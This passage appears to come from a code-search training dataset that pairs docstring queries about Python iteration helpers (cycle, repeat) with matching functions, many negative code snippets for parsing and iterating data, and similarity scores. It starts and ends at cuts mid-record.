re.findall(r'(?P<key>\\S+):(?:\\s+)?(?P<val>\\S+s*)', line)\n if line_match:\n raw_output.update({'epoll': {k.strip(): v.strip() for k, v in line_match}})\n continue\n\n # inotify files\n if line.startswith('inotify'):\n split_line = line[8:].split()\n raw_output['inotify'] = {}\n for item in split_line:\n k, v = item.split(':', maxsplit=1)\n raw_output['inotify'][k] = v\n continue\n\n # fanotify files\n if line.startswith('fanotify'):\n split_line = line[9:].split()\n\n if not 'fanotify' in raw_output:\n raw_output['fanotify'] = {}\n\n for item in split_line:\n k, v = item.split(':', maxsplit=1)\n raw_output['fanotify'][k] = v\n continue\n\n # timerfd files\n if line.split()[0] in split_me:\n split_line = line.replace(':', '').replace('(', '').replace(')', '').replace(',', '').split()\n raw_output[split_line[0]] = [int(x) for x in split_line[1:]]\n continue\n\n key, val = line.split(':', maxsplit=1)\n raw_output[key.strip()] = val.strip()\n continue\n\n return raw_output if raw else _process(raw_output)", "def parse(\n data: str,\n raw: bool = False,\n quiet: bool = False\n) -> List[Dict]:\n jc.utils.compatibility(__name__, info.compatible, quiet)\n jc.utils.input_type_check(data)\n\n raw_output: List = []\n\n if jc.utils.has_data(data):\n\n cleandata = list(filter(None, data.splitlines()))\n cleandata[0] = cleandata[0].replace('#', 'num_')\n raw_output = simple_table_parse(cleandata)\n\n return raw_output if raw else _process(raw_output)", "def processInputData(self, unformattedData):\n tempList = unformattedData.split('\\n')\n rawNodes = copy.copy(list(self.filterRawNodes(tempList)))\n self.vertices = self.createVertices(rawNodes)\n self.edges = self.createEdges(rawNodes, self.vertices)\n self.createEdgesList(rawNodes, self.vertices)", "def datareader(self, path):\n\n f = open(path, 'r')\n data = f.read()\n data = data.split('\\n')\n data_tmp = []\n for idx in range(len(data)):\n if str(data[idx]).find('@data') >= 0:\n data_tmp = data[idx + 1:]\n break\n res = []\n for record in data_tmp:\n record = record.split(',')\n record = map(float, record)\n res.append(record)\n return res", "def parse(input):\n return [l.strip() for l in input.splitlines() if l.strip()]", "def parse_input_2() -> List[int]:\n with open(\"./data/day_13.txt\", \"r\") as f:\n lines = [\n int(n) if re.match(\"^\\d+\", n) else 1 for line in f for n in line.split(\",\")\n ]\n return lines[1:]", "def process(raw):\n entry = { }\n cooked = [ ]\n\n for line in raw:\n line = line.strip()\n if len(line) == 0 or line[0]==\"#\" :\n continue\n parts = line.split(';')\n if len(parts) == 3:\n entry[\"description\"] = parts[0].strip() #adding key and values to the dict\n entry[\"long\"] = parts[1].strip()\n entry[\"lat\"] = parts[2].strip()\n cooked.append(entry) #add this dict entry into the array\n entry = { }\n continue\n else:\n raise ValueError(\"Trouble wiht line: '{}'\\n\".format(line))\n \n return cooked #returning an array of dicts", "def parse_file(input_file):\n \n all_lines = input_file.split('\\n')\n all_info_list = []\n for line in all_lines:\n line = line.split('\\t')\n info_per_row_list = []\n for value in line:\n my_string = \"\"\n value = value.strip('\\'\"')\n if len(value) == 0:\n value = \"NA\"\n my_string += value\n info_per_row_list += [my_string]\n all_info_list += [info_per_row_list]\n return all_info_list", "def parse(\n data: str,\n raw: bool = False,\n quiet: bool = False\n) -> List[Dict]:\n jc.utils.compatibility(__name__, info.compatible, quiet)\n jc.utils.input_type_check(data)\n\n raw_output: List = []\n rows: List = []\n this_row: str = ''\n headers: str = ''\n\n if jc.utils.has_data(data):\n\n for line in filter(None, data.splitlines()):\n row_name, header_data = line.split(':', maxsplit=1)\n\n if row_name in rows:\n # this is data\n _, row_data = line.split(':', maxsplit=1)\n data_table = headers + row_data\n output_line = simple_table_parse(data_table.splitlines())\n output_line[0]['type'] = this_row\n raw_output.extend(output_line)\n continue\n\n else:\n # this is a header row\n rows.append(row_name)\n this_row = row_name\n headers = header_data + '\\n'\n continue\n\n return raw_output if raw else _process(raw_output)", "def parse_data(name):\n with open(name) as f:\n lines = f.read().splitlines()\n lines = filter(lambda x: x.split(' ')[0].isdigit(), lines)\n lx = [int(p.split(' ')[1]) for p in lines]\n ly = [int(p.split(' ')[2]) for p in lines]\n return lx, ly", "def parseArray(self, data):\n self.title = data[0]\n self.director = data[1]\n self.cast = data[2]\n self.producer = data[3]\n self.writer = data[4]\n self.country = data[5]\n self.language = data[6]\n self.year = data[7]\n self.genres = data[8]\n self.votes = data[9]\n self.rating = float(data[10])\n self.runtime = data[11]\n self.plot = data[12]\n self.coverUrl = data[13]", "def extract_values(self, data):\n result = []\n for i in data:\n if(len(i) < 2):\n raise ValueError(\"Length of input list is less than 2!\")\n result.append(i[1])\n return result", "def parse_input():\n carts = []\n tracks = []\n with open('input') as f:\n for line in f:\n line = line.rstrip()\n track = []\n for i, c in enumerate(line):\n if c not in ('<', '>', '^', 'v'):\n char = c\n else:\n if i != 0 and tracks and i < len(tracks[-1]) and \\\n tracks[-1][i] in ('|', '+') and \\\n line[i-1] in ('-', '+'):\n char = '+'\n else:\n if c in ('<', '>'):\n char = '-'\n else:\n char = '|'\n carts.append((len(tracks), i, c, 0))\n track.append(char)\n tracks.append(track)\n\n heapify(carts)\n return tracks, carts", "def _parse_data(self, data):\n return data.get('rows', [])", "def parse_data(data):\n\n # Note that the data will be in ASCII at this point\n source_client = data[3:33]\n dest_client = data[33:63]\n request_verb = data[63:66]\n message = data[256:]\n\n # We want to decode everything before we use the string values in future code\n return source_client.decode(\"utf-8\").strip(), dest_client.decode(\"utf-8\").strip(), \\\n request_verb.decode(\"utf-8\").strip(), message.decode(\"utf-8\").strip()", "def split_records(data, delimiter=r\"\\r\\n\"):\n # https://stackoverflow.com/a/2787979\n return re.split(delimiter + \"\"\"(?=(?:[^'\"]|'[^']*'|\"[^\"]*\")*$)\"\"\", data)", "def parse_products(self, infile):\r\n raise NotImplementedError()", "def extract(self, data):", "def Get_Parses(data):\n parses = []\n sentences = []\n parse_num = -1\n new_flag = True\n for line in data:\n if line == \"\\n\":\n # get rid of sentences with no links\n new_flag = True\n continue\n if new_flag:\n new_flag = False\n curr_sent = line.split()\n if curr_sent[0] == \"###LEFT-WALL###\":\n curr_sent.pop(0)\n sentences.append(curr_sent)\n parses.append([])\n parse_num += 1\n continue\n parses[parse_num].append(line.split())\n\n return parses, sentences", "def parse_input_1() -> List[int]:\n with open(\"./data/day_13.txt\", \"r\") as f:\n lines = [int(n) for line in f for n in line.split(\",\") if re.match(\"^\\d+\", n)]\n return lines", "def _split_proxy_info(data: str) -> list:\n \n country = data[:2]\n anonymity = data[3:4]\n type_ = data[4:].strip('-+ ') # Remove splitting (- and space) and google_passed flag (+)\n google_passed = data[-1]\n\n return [country, anonymity, type_, google_passed]", "def input_from_line(line, char_to_id):\n line = _full_to_half(line)\n line = _replace_html(line)\n inputs = list()\n inputs.append([line])\n line.replace(\" \", \"$\")\n inputs.append([[char_to_id[char] if char in char_to_id else char_to_id[\"<UNK>\"]\n for char in line]])\n inputs.append([_get_seg_features(line)])\n inputs.append([[]])\n return inputs", "def parse_grid(self, data):\n return [list(row) for row in data.strip().split(\"\\n\")]", "def split():\n str_list = sys.stdin.readlines()\n element_list = list()\n\n for line in str_list:\n element_list.extend(split_line(line.rstrip()))\n\n for element in element_list:\n print(element)", "def parse_df(data):\n\n # First column should be the ids\n ids = list(data.iloc[:, 0])\n\n # Second column should hold the labels\n labels = list(data.iloc[:, 1])\n\n # From third columns, we should have the features\n features = list(data.iloc[:, 2:].values)\n\n return ids, labels, features", "def extract(input_data: str) -> list:\n instructions = list()\n for instruction in input_data.split('\\n'):\n op, arg = instruction.split(' ')\n arg = int(arg)\n assert op in ('acc', 'jmp', 'nop')\n instructions.append(Instruction(op, arg))\n return instructions", "def parse(self):", "def extract_data(sentence, start_str):\n pos = sentence.find(start_str)\n if pos == -1:\n return None\n if pos + len(start_str) == len(sentence) - 1:\n return []\n items = sentence[pos + (len(start_str) + 1):].split(',')\n return list(map(lambda x: x.lstrip(), items))", "def get_tokenized_data(data):\r\n \r\n # Get the sentences by splitting up the data\r\n sentences = split_to_sentences(data)\r\n \r\n # Get the list of lists of tokens by tokenizing the sentences\r\n tokenized_sentences = tokenize_sentences(sentences)\r\n \r\n \r\n return tokenized_sentences", "def _parsecsv(x):\n for line in x:\n # decode as utf-8, whitespace-strip and split on delimiter\n yield line.decode('utf-8').strip().split(config.DELIMITER)", "def split_data(msg, expected_fields):\r\n\tmsg_split = msg.split(DATA_DELIMITER)\r\n\tif len(msg_split) == expected_fields:\r\n\t\treturn msg_split\r\n\treturn []", "def parse_string_list(data):\n txt = data.decode()\n x = ast.literal_eval(txt)\n return x", "def transform_input(data: str) -> Matrix:\n return [\n list(map(int, list(row)))\n for row in data.split('\\n')\n ]" ]
[ "0.6394949", "0.6299175", "0.6273174", "0.62510943", "0.6217176", "0.62149054", "0.6148983", "0.61309695", "0.6124276", "0.6101856", "0.60483354", "0.5908739", "0.5896337", "0.588902", "0.587758", "0.58742684", "0.5872623", "0.5748684", "0.57401425", "0.57069176", "0.5701802", "0.5689349", "0.5685283", "0.5682524", "0.566895", "0.566827", "0.5655468", "0.5650751", "0.5650112", "0.5642615", "0.5638842", "0.5620007", "0.55991566", "0.5594632", "0.5593483", "0.55770665", "0.55749243", "0.5562104", "0.5560864", "0.55585235", "0.55550784", "0.5544537", "0.55380666", "0.5532915", "0.55160624", "0.5512381", "0.5510513", "0.5486617", "0.54797256", "0.5477001", "0.54747564", "0.5469754", "0.5469742", "0.5457851", "0.5451118", "0.54452044", "0.5437709", "0.5417147", "0.54159397", "0.5410328", "0.5405289", "0.5400153", "0.53973603", "0.5385922", "0.5367375", "0.5363574", "0.53621817", "0.533885", "0.53350717", "0.5330304", "0.5318171", "0.5312752", "0.5311315", "0.5309263", "0.53075325", "0.53013253", "0.5299226", "0.5298995", "0.5298714", "0.52976006", "0.52966535", "0.52954555", "0.52903134", "0.5286515", "0.5286078", "0.52840763", "0.5283312", "0.52831113", "0.5279747", "0.5262333", "0.5262013", "0.52575874", "0.52521825", "0.52446395", "0.52427083", "0.5238558", "0.52342975", "0.5233036", "0.5231848", "0.52293366", "0.5228925" ]
0.0
-1
Return elements from the iterable until it is exhausted. Then repeat the sequence indefinitely. cycle(seq) ==> seq[0], seq[1], ..., seq[n 1], seq[0], seq[1], ...
def cycle(seq, n=None): if n is not None: return Iter(_ncycle(n, seq)) return Iter(itertools.cycle(seq))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cycle(iterator: Iterable[Any]) -> Iterable[Any]:\n while True:\n yield from iterator", "def iter_sequence_infinite(seq):\n while True:\n for item in seq:\n yield item", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def repeat(iterable, count=None):\n if count is None:\n while True:\n for sample in iterable:\n yield sample\n else:\n for i in range(count):\n for sample in iterable:\n yield sample", "def pick(iterable):\n for element in iterable:\n yield element\n while True:\n yield element", "def cycle(obj):\r\n while True:\r\n for item in obj:\r\n yield item", "def forever(iterable):\n it = iter(iterable)\n while True:\n try:\n yield next(it)\n except Exception as e:\n print(e)\n it = iter(iterable)", "def simple_seq(seq):\n for i in seq:\n yield i", "def repeatedly(func, /, *args, **kwargs):\n func = to_callable(func)\n try:\n while True:\n yield func(*args, **kwargs)\n except StopIteration as e:\n yield from stop_seq(e)", "def forever():\n\n def animate(thing):\n thing = list(thing)\n yield from repeat(thing)\n return animate", "def color_cycle():\n while True:\n for color in colors:\n yield color", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def loop(self):\n yield self\n e = self.next\n while e is not self:\n yield e\n e = e.next", "def eat(seq, n=None):\n if n is None:\n collections.deque(seq, maxlen=0)\n else:\n next(itertools.islice(seq, n, n), None)", "def cycle(effect):\n\n def animate(thing):\n frames = (list(frame) for frame in effect(thing))\n yield from cycle(frames)\n return animate", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def cycles(n, support, randomize=False):\n support = np.array(support)\n\n def gen(p):\n g = combinations(support, n)\n if randomize:\n g = list(g)\n random.shuffle(g)\n\n for local_support in g:\n for output_p in all_permutations(local_support)(p):\n yield output_p\n\n return gen", "def takeNGenerator(seq, n):\n\tindex = 0\n\twhile index + n <= len(seq):\n\t\tyield seq[index:index + n]\n\t\tindex = index + 1", "def repeat(obj, times=None):\n if times is None:\n return Iter(itertools.repeat(obj))\n return Iter(itertools.repeat(obj, times))", "def iter_n(sequence: Sequence[T], n: int) -> List[T]:\n\t\n\tfor i in range(len(sequence) - (n-1)):\n\t\tyield sequence[i:i+n]", "def iterate(iterator, n):\n # throw away n-1 elements\n for index in range(1, n):\n next(iterator, None)\n\n return next(iterator, None)", "def __iter__(self):\n for x in self.seq: yield x", "def __iter__(self):\n while True:\n for item in (self[i] for i in range(len(self))):\n yield item", "def random_iterator(seq:Sequence[Any], maxlen=None) -> Any:\n if not hasattr(seq, \"__len__\") or not hasattr(seq, \"__getitem__\"):\n raise TypeError(\"Sequence must be indexable\")\n N = len(seq)\n order = list(range(N))\n random.shuffle(order)\n for i,j in enumerate(cycle(order)):\n if maxlen is not None and i > maxlen:\n return\n yield seq[j]", "def just(n, seq):\n it = iter(seq)\n for _ in range(n - 1):\n yield next(it, None)\n yield tuple(it)", "def _cycle_loop(self):\n cycle, idx = self.cycling, self.current_idx # Local copy to avoid race condition updates\n\n if cycle: # Iterate to next command\n idx = (idx+1) % len(self)\n self.current_idx = idx\n self.updated = True\n\n time.sleep(self.cycle_interval)", "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def intersperse(value, seq):\n seq = iter(seq)\n\n try:\n yield next(seq)\n except StopIteration:\n return\n\n for item in seq:\n yield value\n yield item", "def roll(self):\n try:\n for s in self.seq:\n yield s\n except StopIteration as si:\n # You called roll after using up the sequence. return None\n return None", "def infinite_odd_generator():\n current = 1\n while True:\n yield current\n current = current + 2", "def generator_wrapper(iterable):\n\n num_items = len(iterable)\n for idx in range(num_items):\n yield iterable[idx]", "def every_other(seq):\n seq = seq[::2]\n return seq", "def forever(shard):\n def repeat(*args, **kwargs):\n while True:\n for delay in shard(*args, **kwargs):\n yield delay\n return repeat", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def next_n(iterator, N):\n try:\n items = []\n for _ in range(N):\n items.append(next(iterator))\n return items\n except StopIteration:\n if items:\n return items\n return None", "def permutations(iterable, r=None):\n pool = tuple(iterable)\n n = len(pool)\n if r is None:\n r = n\n indices = list(range(n))\n cycles = list(range(n-r+1, n+1))[::-1]\n yield tuple(pool[i] for i in indices[:r])\n while n:\n for i in reversed(list(range(r))):\n cycles[i] -= 1\n if cycles[i] == 0:\n indices[i:] = indices[i+1:] + indices[i:i+1]\n cycles[i] = n - i\n else:\n j = cycles[i]\n indices[i], indices[-j] = indices[-j], indices[i]\n yield tuple(pool[i] for i in indices[:r])\n break\n else:\n return", "def cons(el, seq):\n yield el\n for s in seq:\n yield s", "def group(seq, size):\n if not hasattr(seq, 'next'):\n seq = iter(seq)\n while True:\n yield [seq.next() for i in xrange(size)]", "def every_other(seq):\n every_other = seq[::2]\n return every_other", "def chunk(iterable: Iterable[A], n: int) \\\n -> Iterable[more_itertools.more.peekable]:\n iterator = iter(iterable)\n while True:\n chunk_ = more_itertools.peekable(itertools.islice(iterator, n))\n try:\n chunk_.peek()\n except StopIteration:\n return\n yield chunk_", "def make_iter(capture, channel):\n\n def cycle():\n threading.Timer(INTERVAL, cycle).start()\n publish_frame(capture, channel)\n\n return cycle", "def product(*iterables, **kwargs):\n if len(iterables) == 0:\n yield ()\n else:\n iterables = iterables * kwargs.get('repeat', 1)\n it = iterables[0]\n for item in it() if callable(it) else iter(it):\n for items in product(*iterables[1:]):\n yield (item, ) + items", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def cyclic(length = None, alphabet = None, n = None):\n if n is None:\n n = context.cyclic_size\n\n if alphabet is None:\n alphabet = context.cyclic_alphabet\n\n if length is not None and len(alphabet) ** n < length:\n log.error(\"Can't create a pattern length=%i with len(alphabet)==%i and n==%i\",\n length, len(alphabet), n)\n\n generator = de_bruijn(alphabet, n)\n out = iters.take(length, generator)\n\n return _join_sequence(out, alphabet)", "def _iterate(self, start=None, use_repetitions=True):\r\n path = start and start.path or [] # path to start\r\n multiple = start and start.multiple or [-1] # multiple to start\r\n\r\n elements = [] # a stack of elements\r\n cur = self.root # current element\r\n index = 0 # the next child element to examine\r\n \r\n def get_repetitions(element):\r\n \"\"\"Return the number of times an element is repeated.\"\"\"\r\n return int(element.attrib.get('repeat', 1))\r\n \r\n # go to start\r\n for i in path:\r\n elements.append(cur)\r\n cur = cur[i]\r\n multiple[-1] += 1\r\n\r\n try:\r\n while True:\r\n repetitions = get_repetitions(cur)\r\n if multiple[-1] >= repetitions and repetitions != 0:\r\n index = path.pop() + 1\r\n multiple.pop()\r\n cur = elements.pop()\r\n elif len(cur) == 0:\r\n yield Moment(cur.get('name'), cur.get('descr'), copy(path), copy(multiple))\r\n multiple[-1] += 1\r\n elif index < len(cur):\r\n path.append(index)\r\n multiple.append(0)\r\n elements.append(cur)\r\n cur = cur[index]\r\n index = 0\r\n if not use_repetitions: multiple[-1] = get_repetitions(cur) - 1\r\n else:\r\n multiple[-1] += 1\r\n index = 0\r\n except IndexError:\r\n pass # iteration is done\r", "def repeated_iteration(self) -> global___Statement.Iteration.RepeatedIteration:", "def group(n, iterable, fill_value = None):\n args = [iter(iterable)] * n\n return izip_longest(fillvalue = fill_value, *args)", "def __iter__(self):\n i = self.head\n while True:\n if not i:\n break\n yield i\n i = i.next\n if not i:\n break", "def __iter__(self) -> Generator:\r\n yield from self.sequence", "def __iter__(self):\n while True:\n if self.stop:\n return\n for item in self.get_next_batch():\n yield item", "def every_other(seq):\n return seq[::2]", "def consume(iterator, n=None, next=next, islice=islice, deque=deque):\n if n is not None:\n next(islice(iterator, n, n), None)\n else:\n exhaust(iterator)", "def __iter__(self):\n cursor = self.first()\n while cursor is not None:\n yield cursor.element()\n cursor = self.after(cursor)", "def scan(func, iterable, start=_EMPTY, *, echo_start=True):\n it = iter(iterable)\n if start is _EMPTY:\n start = next(it)\n if echo_start:\n yield start\n for item in it:\n start = func(start, item)\n yield start", "def roundrobin(*iterables):\n # Recipe credited to George Sakkis\n pending = len(iterables)\n nexts = cycle(iter(it).next for it in iterables)\n while pending:\n try:\n for next in nexts:\n yield next()\n except StopIteration:\n pending -= 1\n nexts = cycle(islice(nexts, pending))", "def caboose(seq: Iterable[TItem], el: TElement) -> Iterable[Union[TElement, TItem]]:\n yield from seq\n yield el", "def e_seq():\n yield 2;\n for n in count(2, 2):\n yield 1\n yield n\n yield 1", "def iterslices(iterable, n, pad_last=False, pad_value=None):\n current = []\n for a in iterable:\n current.append(a)\n if len(current) == n:\n yield current\n current = []\n if current:\n if pad_last:\n current += [pad_value] * (n-len(current))\n yield current", "def chunks(seq: Sequence[T], n: int) -> Iterator[Sequence[T]]:\n for i in range(0, len(seq), n):\n yield seq[i:i + n]", "def _cycle_through_pieces(self, piece_list):\n number_of_pieces = len(piece_list)\n if number_of_pieces > 0:\n animation_length = 3\n cycle_length = number_of_pieces * animation_length\n current_animation_frame = frame.current_frame % cycle_length\n return piece_list[int(current_animation_frame / animation_length)]\n return piece_list[0]", "def all_cycles_iterator(self, starting_vertices=None, simple=False,\n rooted=False, max_length=None, trivial=False):\n if starting_vertices is None:\n starting_vertices = self\n # Since a cycle is always included in a given strongly connected\n # component, we may remove edges from the graph\n sccs = self.strongly_connected_components()\n d = {}\n for id, component in enumerate(sccs):\n for v in component:\n d[v] = id\n h = copy(self)\n h.delete_edges([ (u,v) for (u,v) in h.edge_iterator(labels=False)\n if d[u] != d[v] ])\n # We create one cycles iterator per vertex. This is necessary if we\n # want to iterate over cycles with increasing length.\n vertex_iterators = dict([(v, h._all_cycles_iterator_vertex( v\n , starting_vertices=starting_vertices\n , simple=simple\n , rooted=rooted\n , max_length=max_length\n , trivial=trivial\n , remove_acyclic_edges=False\n )) for v in starting_vertices])\n cycles = []\n for vi in vertex_iterators.values():\n try:\n cycle = next(vi)\n cycles.append((len(cycle), cycle))\n except(StopIteration):\n pass\n # Since we always extract a shortest path, using a heap\n # can speed up the algorithm\n from heapq import heapify, heappop, heappush\n heapify(cycles)\n while cycles:\n # We choose the shortest available cycle\n _, shortest_cycle = heappop(cycles)\n yield shortest_cycle\n # We update the cycle iterator to its next available cycle if it\n # exists\n try:\n cycle = next(vertex_iterators[shortest_cycle[0]])\n heappush(cycles, (len(cycle), cycle))\n except(StopIteration):\n pass", "def __iter__(self):\n for i in range(self.n):\n yield self.get(i, i + 1)", "def take(n, seq):\n return itertools.islice(seq, n)", "def advance(self):\n elem = next(self._iterable)\n for deque in self._deques:\n deque.append(elem)", "def lookahead(n, iterable):\n for value in islice(copy.copy(iterable), n, None):\n return value\n raise IndexError(n)", "def __next__(self):\n self._k += 1\n if self._k < len(self._seq):\n return(self._seq[self._k])\n else:\n # print('*** End of iteration. ***')\n raise StopIteration()", "def get_consistent_generator(iterable):\n try:\n first = next(iterable)\n except StopIteration:\n return None\n\n if first is None:\n return None\n\n return itertools.chain([first], iterable)", "def next(self):\n return self.cycle.next()", "def roundrobin_generators(*iterables):\n sentinel = object()\n return (item\n for item in itertools.chain.from_iterable(\n zip_longest(*iterables, fillvalue=sentinel))\n if item is not sentinel)", "def powerset(seq):\n if len(seq) <= 1:\n yield seq\n yield []\n else:\n for item in powerset(seq[1:]):\n yield [seq[0]]+item\n yield item", "def powerset(seq):\n if len(seq) <= 1:\n yield seq\n yield []\n else:\n for item in powerset(seq[1:]):\n yield [seq[0]]+item\n yield item", "def powerset(seq):\n if len(seq) <= 1:\n yield seq\n yield []\n else:\n for item in powerset(seq[1:]):\n yield [seq[0]]+item\n yield item", "def next_n(self, n, fast_forward=False):\n return list(it.islice(self.gen, n))", "def progression(first_item:int, amount:int,func):\n item = first_item\n count = 0\n stop = False\n while count < amount and not stop:\n stop = yield item\n item = func(item)\n count += 1", "def sentinelize(inputSeq, sentinel=None, loopSentinel=False, failFun=None):\n for item in inputSeq:\n yield item\n yield sentinel\n while loopSentinel:\n yield loopSentinel\n if failFun:\n failFun()", "def consume(iterator, n=None):\n # Use functions that consume iterators at C speed.\n if n is None:\n # feed the entire iterator into a zero-length deque\n collections.deque(iterator, maxlen=0)\n else:\n # advance to the empty slice starting at position n\n next(islice(iterator, n, n), None)", "def full_nloop_iterator(self, start=None, length=1):\n from itertools import ifilter, imap\n\n g = self.path(start)\n\n ifull = ifilter(\n lambda x: x.is_loop() and x.is_full(),\n self._all_npath_extension(g,length))\n\n return imap(copy, ifull)", "def batch(\n iterable: Iterable[_T], n: int\n) -> Generator[tuple[_T, ...], None, None]:\n iterator = iter(iterable)\n while True:\n try:\n # Unnecessary list here, but a generator won't raise StopIteration,\n # instead it will raise RuntimeError: \"generator raises StopIteration\".\n # I'd rather have a list comprehension in place of a generator expression\n # than catch RuntimeError and have to inspect the payload to verify it's\n # the one I want to be catching.\n yield tuple([next(iterator) for _ in range(n)])\n except StopIteration:\n return", "def range(self, n):\n for i in range(n):\n yield self.get()", "def batch(iterable, size):\n sourceiter = iter(iterable)\n while True:\n batchiter = islice(sourceiter, size)\n yield list(chain([batchiter.next()], batchiter))", "def _next(self):\n i = 0\n while i < self.size:\n yield self.data[i]\n i += 1", "def consume(iterator, n=None):\n # Use functions that consume iterators at C speed.\n if n is None:\n # feed the entire iterator into a zero-length deque\n deque(iterator, maxlen=0)\n else:\n # advance to the empty slice starting at position n\n next(islice(iterator, n, n), None)", "def sequences(self):\n # i am one\n yield self\n # nothing further\n return", "def infinite_increment():\n i = 0\n while 1:\n yield i\n i += 1", "def PeekIterable(iterable):\n try:\n head_element = iterable.next()\n new_iterable = itertools.chain([head_element], iterable)\n return head_element, new_iterable\n except StopIteration:\n return None, iterable", "def interleave(*seqs):\n queue = deque(iter(seq) for seq in seqs)\n\n while queue:\n seq = queue.popleft()\n\n try:\n yield next(seq)\n except StopIteration:\n pass\n else:\n queue.append(seq)", "def odd_generator(limit):\n current = 1\n while current < limit:\n yield current\n current = current + 2", "def iter_py():\n s = \"Hello, World!\"\n it = iter(s)\n while True:\n try:\n print(next(it))\n except:\n break\n\n ## Output\n # H\n # e\n # l\n # l\n # o\n # ,\n #\n # W\n # o\n # r\n # l\n # d\n # !", "def iter(self):\n s = self.first\n while True:\n yield s\n s = s.__next__\n if s == self.first:\n return", "def cons(element, sequence):\n yield element\n for s in sequence:\n yield s", "def chunks(iterable: Iterable, n: int = 1000, cls: Type = list) -> Generator:\n\n it = iter(iterable)\n while True:\n chunked = itertools.islice(it, n)\n try:\n first_element = next(chunked)\n except StopIteration:\n return\n yield cls(itertools.chain((first_element,), chunked))", "def limit(iterable, n):\n for count, element in enumerate(iterable):\n if count >= n: break\n else: yield element", "def window(seq, size=2, stride=1):\n it = iter(seq)\n result = []\n for elem in it:\n result.append(elem)\n if len(result) == size:\n yield result\n result = result[stride:]", "def iwindow(seq, n):\n it = iter(seq)\n result = tuple(islice(it, n))\n\n if len(result) == n:\n yield result\n\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def grouper( n, iterable, fillvalue=None ):\n args = [iter(iterable)]*n\n return list( it.izip_longest(fillvalue=fillvalue, *args) )", "def interleave(seqs, pass_exceptions=()):\n iters = map(iter, seqs)\n while iters:\n newiters = []\n for itr in iters:\n try:\n yield next(itr)\n newiters.append(itr)\n except (StopIteration,) + tuple(pass_exceptions):\n pass\n iters = newiters", "def cycles_to_seq(*cycles):\n perm = {}\n for cycle in cycles:\n perm.update({cycle[i]: cycle[(i + 1) % len(cycle)] for i in range(len(cycle))})\n seq = [perm.get(i, i) for i in range(8)]\n return tuple(seq)" ]
[ "0.77041095", "0.73121995", "0.68373466", "0.68154997", "0.64987105", "0.64865166", "0.64855176", "0.61515063", "0.61507326", "0.6116417", "0.585476", "0.5825893", "0.5797128", "0.5789132", "0.57815135", "0.5774213", "0.577342", "0.5757885", "0.5697775", "0.56689405", "0.5658311", "0.5647523", "0.5640964", "0.56174076", "0.5600153", "0.55896604", "0.55807495", "0.55608416", "0.55259067", "0.54828894", "0.54716885", "0.54686093", "0.5452897", "0.5435661", "0.54349595", "0.53902084", "0.5389542", "0.53804487", "0.5373242", "0.5367215", "0.5331997", "0.53189427", "0.53159785", "0.53050447", "0.53019166", "0.5301752", "0.5287728", "0.528371", "0.5276838", "0.527277", "0.52724755", "0.52679473", "0.52679205", "0.5262095", "0.52521235", "0.5243606", "0.5241918", "0.5239871", "0.52268285", "0.5223724", "0.5222459", "0.52136475", "0.5208558", "0.5208425", "0.5195463", "0.5191771", "0.5186492", "0.5181479", "0.5171553", "0.5169217", "0.5169217", "0.5169217", "0.5165681", "0.5141766", "0.5139018", "0.5137213", "0.513629", "0.5134784", "0.51278305", "0.5126535", "0.51230067", "0.51094174", "0.51025397", "0.5100205", "0.5096645", "0.50856036", "0.5079041", "0.5078115", "0.5077964", "0.5077669", "0.5075161", "0.5068543", "0.5068077", "0.50647646", "0.505522", "0.505522", "0.50542426", "0.5044087", "0.50426155", "0.50360745" ]
0.78215605
0
Returns the object for the specified number of times. If not specified, returns the object endlessly.
def repeat(obj, times=None): if times is None: return Iter(itertools.repeat(obj)) return Iter(itertools.repeat(obj, times))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def repeat(self, count):\n return self.Sequence((self,) * count)", "def repeat(self, fn, *args, **kwargs):\n return repeat_n_times(self.n, fn, *args, **kwargs)", "def twist(r, num_repeats=1):\n for i in range(num_repeats):\n r.go(0, 50)\n time.sleep(.75)\n r.stop()\n time.sleep(.1)\n r.go(0, -50)\n time.sleep(.75)\n r.stop()\n time.sleep(.1)", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def repeat(num_times):\n\n def decorator_repeat(func):\n \"\"\"\n defines wrapper_repeat(*args, **kwargs)\n\n :returns: wrapper_repeat\n \"\"\"\n\n @functools.wraps(func)\n def wrapper_repeat(*args, **kwargs):\n \"\"\"\n func(*args, **kwargs) num_times\n\n :return: last return value\n \"\"\"\n for _ in range(num_times):\n value = func(*args, **kwargs)\n return value\n\n return wrapper_repeat\n\n return decorator_repeat", "def retry(times):\n return repeat_with_success_at_least(times, 1)", "def repeat(iterable, count=None):\n if count is None:\n while True:\n for sample in iterable:\n yield sample\n else:\n for i in range(count):\n for sample in iterable:\n yield sample", "def range(self, n):\n for i in range(n):\n yield self.get()", "def repeat_count(instance, args):\r\n count = instance.repeat_count(args)\r\n return count", "def run(self,n=10):\n return self.transduce([None] * n)", "def take(n, iterable, islice=islice):\n return islice(iterable, n)", "def taking(n):\n if n <= 0:\n raise ValueError('taking() requires a positive value.')\n\n @coroutine\n def gen(target):\n for _ in range(n):\n x = (yield)\n target.send(x)\n\n raise StopConsumption()\n\n return gen", "def limit(iterable, n):\n for count, element in enumerate(iterable):\n if count >= n: break\n else: yield element", "def next_n(self, n: int, fast_forward=False):\n data = []\n while len(data) < n:\n try:\n record = self.queue.get(True, self.wait)\n data.append(record)\n except Empty:\n raise StopIteration\n return data", "def nextNumberOfResults(self, N=10):\n self.start += self.N\n self.N = N", "def take(iterable, n):\n\n def taking(iterable_):\n for i, e in enumerate(iterable_):\n if i < n:\n yield e\n\n return taking(iterable)", "def get_first_n_crawled_chunks(self, number):\n try:\n conn = psycopg2.connect(\"dbname='{0}'\".format(DATABASE))\n cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)\n cur.execute(\"SELECT * FROM crawler WHERE c_task = 'crawled' ORDER BY index LIMIT %s;\", 